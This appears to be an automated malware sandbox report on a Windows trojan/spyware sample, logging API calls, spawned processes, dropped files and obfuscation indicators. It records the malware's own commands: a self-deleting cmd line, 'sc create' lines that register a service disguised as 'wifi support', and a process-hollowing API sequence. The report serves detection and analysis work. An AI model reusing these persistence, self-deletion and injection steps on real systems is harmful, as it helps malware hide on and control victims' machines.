Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 3_2_0040201A
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 3_2_0040201E
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 3_2_0040202D
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_2_00402084 LocalAlloc,NtQuerySystemInformation, 3_2_00402084
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_2_00402491 NtOpenKey, 3_2_00402491
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 3_1_00402000
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose, 3_1_0040250A
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 3_1_0040201A
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 3_1_0040201E
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 3_1_0040202D
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_1_00402084 LocalAlloc,NtQuerySystemInformation, 3_1_00402084
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_1_00402491 NtOpenKey, 3_1_00402491
Source: C:\Users\user\AppData\Roaming\ewswwsi Code function: 15_2_00790110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 15_2_00790110
Source: C:\Users\user\AppData\Roaming\ewswwsi Code function: 16_2_00401962 Sleep,NtTerminateProcess, 16_2_00401962
Source: C:\Users\user\AppData\Roaming\ewswwsi Code function: 16_2_0040196D Sleep,NtTerminateProcess, 16_2_0040196D
Source: C:\Users\user\AppData\Roaming\ewswwsi Code function: 16_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 16_2_00402000
Source: C:\Users\user\AppData\Roaming\ewswwsi Code function: 16_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose, 16_2_0040250A
Source: C:\Users\user\AppData\Roaming\ewswwsi Code function: 16_2_00401A0B NtTerminateProcess, 16_2_00401A0B
Source: C:\Users\user\AppData\Roaming\ewswwsi Code function: 16_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 16_2_0040201A
Source: C:\Users\user\AppData\Roaming\ewswwsi Code function: 16_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 16_2_0040201E
Source: C:\Users\user\AppData\Roaming\ewswwsi Code function: 16_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 16_2_0040202D
Source: C:\Users\user\AppData\Roaming\ewswwsi Code function: 16_2_00402084 LocalAlloc,NtQuerySystemInformation, 16_2_00402084
Source: C:\Users\user\AppData\Roaming\ewswwsi Code function: 16_2_00402491 NtOpenKey, 16_2_00402491
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: 21_2_00401820 GetCurrentProcess,NtQueryInformationToken, 21_2_00401820
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_0500F940 NtAllocateVirtualMemory, 22_2_0500F940
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_0500F860 NtUnmapViewOfSection, 22_2_0500F860
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: 21_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle, 21_2_00408E26
Source: 8DDA.exe.11.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: A7CD.exe.11.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
Source: 4f4deRCUD7.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\ewswwsi Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@45/20@61/15
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: 21_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep, 21_2_00409A6B
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: 21_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep, 21_2_00409A6B
Source: 4f4deRCUD7.exe Virustotal: Detection: 33%
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\4f4deRCUD7.exe "C:\Users\user\Desktop\4f4deRCUD7.exe"
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Process created: C:\Users\user\Desktop\4f4deRCUD7.exe "C:\Users\user\Desktop\4f4deRCUD7.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Users\user\AppData\Roaming\ewswwsi C:\Users\user\AppData\Roaming\ewswwsi
Source: C:\Users\user\AppData\Roaming\ewswwsi Process created: C:\Users\user\AppData\Roaming\ewswwsi C:\Users\user\AppData\Roaming\ewswwsi
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\1E73.exe C:\Users\user\AppData\Local\Temp\1E73.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\2961.exe C:\Users\user\AppData\Local\Temp\2961.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3161.exe C:\Users\user\AppData\Local\Temp\3161.exe
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\1E73.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\AppData\Local\Temp\2961.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\vlrzpavj\
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process created: C:\Users\user\AppData\Local\Temp\3161.exe C:\Users\user\AppData\Local\Temp\3161.exe
Source: C:\Users\user\AppData\Local\Temp\2961.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\dkbkykdu.exe" C:\Windows\SysWOW64\vlrzpavj\
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2961.exe Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\SysWOW64\sc.exe" create vlrzpavj binPath= "C:\Windows\SysWOW64\vlrzpavj\dkbkykdu.exe /d\"C:\Users\user\AppData\Local\Temp\2961.exe\"" type= own start= auto DisplayName= "wifi support
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process created: C:\Users\user\AppData\Local\Temp\3161.exe C:\Users\user\AppData\Local\Temp\3161.exe
Source: C:\Users\user\AppData\Local\Temp\2961.exe Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\SysWOW64\sc.exe" description vlrzpavj "wifi internet conection
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2961.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe" start vlrzpavj
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Process created: C:\Users\user\Desktop\4f4deRCUD7.exe "C:\Users\user\Desktop\4f4deRCUD7.exe" Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\1E73.exe C:\Users\user\AppData\Local\Temp\1E73.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\2961.exe C:\Users\user\AppData\Local\Temp\2961.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3161.exe C:\Users\user\AppData\Local\Temp\3161.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewswwsi Process created: C:\Users\user\AppData\Roaming\ewswwsi C:\Users\user\AppData\Roaming\ewswwsi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\1E73.exe" & exit Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process created: C:\Users\user\AppData\Local\Temp\3161.exe C:\Users\user\AppData\Local\Temp\3161.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process created: C:\Users\user\AppData\Local\Temp\3161.exe C:\Users\user\AppData\Local\Temp\3161.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\1E73.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: 21_2_00406A60 lstrcatA,CreateFileA,GetDiskFreeSpaceA,GetLastError,CloseHandle,CloseHandle,FindCloseChangeNotification,GetLastError,CloseHandle,DeleteFileA,GetLastError, 21_2_00406A60
Source: sqlite3[1].dll.19.dr, sqlite3.dll.19.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: sqlite3[1].dll.19.dr, sqlite3.dll.19.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: sqlite3[1].dll.19.dr, sqlite3.dll.19.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: sqlite3[1].dll.19.dr, sqlite3.dll.19.dr Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: sqlite3[1].dll.19.dr, sqlite3.dll.19.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: sqlite3[1].dll.19.dr, sqlite3.dll.19.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: sqlite3[1].dll.19.dr, sqlite3.dll.19.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: sqlite3[1].dll.19.dr, sqlite3.dll.19.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: sqlite3[1].dll.19.dr, sqlite3.dll.19.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: sqlite3[1].dll.19.dr, sqlite3.dll.19.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: sqlite3[1].dll.19.dr, sqlite3.dll.19.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: sqlite3[1].dll.19.dr, sqlite3.dll.19.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Users\user\AppData\Local\Temp\3161.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6156:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5468:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6216:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4244:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6632:120:WilError_01
Source: 3161.exe.11.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 3161.exe.11.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 22.0.3161.exe.610000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 22.0.3161.exe.610000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 22.0.3161.exe.610000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 22.0.3161.exe.610000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 22.2.3161.exe.610000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 22.2.3161.exe.610000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 22.0.3161.exe.610000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 22.0.3161.exe.610000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 22.0.3161.exe.610000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 22.0.3161.exe.610000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: 4f4deRCUD7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 4f4deRCUD7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 4f4deRCUD7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 4f4deRCUD7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 4f4deRCUD7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 4f4deRCUD7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 4f4deRCUD7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: M;C:\ros\jomo\kuxoxitin.pdb source: 4f4deRCUD7.exe, ewswwsi.11.dr
Source: Binary string: C:\ros\jomo\kuxoxitin.pdb source: 4f4deRCUD7.exe, ewswwsi.11.dr
Source: Binary string: C:\micat\xi.pdb source: 1E73.exe, 00000013.00000000.392170146.0000000000401000.00000020.00020000.sdmp, 1E73.exe.11.dr
Source: Binary string: /C:\kacij97\bokavepafecotu\hoxuteyitezet\wikipa\z.pdb source: 9667.exe.11.dr
Source: Binary string: C:\kacij97\bokavepafecotu\hoxuteyitezet\wikipa\z.pdb source: 9667.exe.11.dr
Source: Binary string: C:\hevetuzovuxa.pdb source: 2961.exe, 00000015.00000000.396557288.0000000000401000.00000020.00020000.sdmp, 2961.exe.11.dr, dkbkykdu.exe.21.dr
Source: Binary string: C:\zoci\kiz\ponecun6\camokixuki1\janel.pdb source: 8DDA.exe.11.dr
Source: Binary string: HC:\hevetuzovuxa.pdb source: 2961.exe, 00000015.00000000.396557288.0000000000401000.00000020.00020000.sdmp, 2961.exe.11.dr, dkbkykdu.exe.21.dr

Data Obfuscation:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Unpacked PE file: 19.2.1E73.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\2961.exe Unpacked PE file: 21.2.2961.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Unpacked PE file: 19.2.1E73.exe.400000.0.unpack .text:ER;.data:W;.cixi:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\2961.exe Unpacked PE file: 21.2.2961.exe.400000.0.unpack .text:ER;.data:W;.vupa:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
.NET source code contains method to dynamically call methods (often used by packers)
Source: 3161.exe.11.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 22.0.3161.exe.610000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 22.2.3161.exe.610000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 22.0.3161.exe.610000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 22.0.3161.exe.610000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 36.0.3161.exe.350000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 36.2.3161.exe.350000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 36.0.3161.exe.350000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 36.0.3161.exe.350000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_2_00401880 push esi; iretd 3_2_00401893
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_2_00402E94 push es; iretd 3_2_00402EA0
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_1_00402E94 push es; iretd 3_1_00402EA0
Source: C:\Users\user\AppData\Roaming\ewswwsi Code function: 15_2_00793634 push es; iretd 15_2_00793640
Source: C:\Users\user\AppData\Roaming\ewswwsi Code function: 16_2_00401880 push esi; iretd 16_2_00401893
Source: C:\Users\user\AppData\Roaming\ewswwsi Code function: 16_2_00402E94 push es; iretd 16_2_00402EA0
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_004139B0 push eax; ret 19_2_004139DE
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00873C00 push eax; ret 19_2_00873C2E
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: 21_2_00424468 push eax; ret 21_2_00424486
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_00618C65 push 00000028h; retf 0000h 22_2_00618C6A
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_00617649 push ebp; ret 22_2_0061764A
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_00F03C43 push ss; iretd 22_2_00F03C4F
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_04FDCCF8 pushfd ; retf 22_2_04FDCCF9
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_04FDCCB8 pushad ; retf 22_2_04FDCCB9
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 36_2_00358C65 push 00000028h; retf 0000h 36_2_00358C6A
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 36_2_00357649 push ebp; ret 36_2_0035764A
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 43_2_002B8C65 push 00000028h; retf 0000h 43_2_002B8C6A
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 43_2_002B7649 push ebp; ret 43_2_002B764A
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 1_2_004376A0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_004376A0
Binary contains a suspicious time stamp
Source: D845.exe.11.dr Static PE information: 0xE4CF37EC [Fri Aug 24 09:18:36 2091 UTC]
PE file contains sections with non-standard names
Source: 4f4deRCUD7.exe Static PE information: section name: .lipomik
Source: 8DDA.exe.11.dr Static PE information: section name: .huwu
Source: 8DDA.exe.11.dr Static PE information: section name: .sax
Source: 9667.exe.11.dr Static PE information: section name: .cepuxam
Source: A7CD.exe.11.dr Static PE information: section name: .adata
Source: A7CD.exe.11.dr Static PE information: section name: .adata
Source: 1E73.exe.11.dr Static PE information: section name: .cixi
Source: 2961.exe.11.dr Static PE information: section name: .vupa
Source: ewswwsi.11.dr Static PE information: section name: .lipomik
Source: sqlite3.dll.19.dr Static PE information: section name: /4
Source: sqlite3.dll.19.dr Static PE information: section name: /19
Source: sqlite3.dll.19.dr Static PE information: section name: /35
Source: sqlite3.dll.19.dr Static PE information: section name: /51
Source: sqlite3.dll.19.dr Static PE information: section name: /63
Source: sqlite3.dll.19.dr Static PE information: section name: /77
Source: sqlite3.dll.19.dr Static PE information: section name: /89
Source: sqlite3.dll.19.dr Static PE information: section name: /102
Source: sqlite3.dll.19.dr Static PE information: section name: /113
Source: sqlite3.dll.19.dr Static PE information: section name: /124
Source: sqlite3[1].dll.19.dr Static PE information: section name: /4
Source: sqlite3[1].dll.19.dr Static PE information: section name: /19
Source: sqlite3[1].dll.19.dr Static PE information: section name: /35
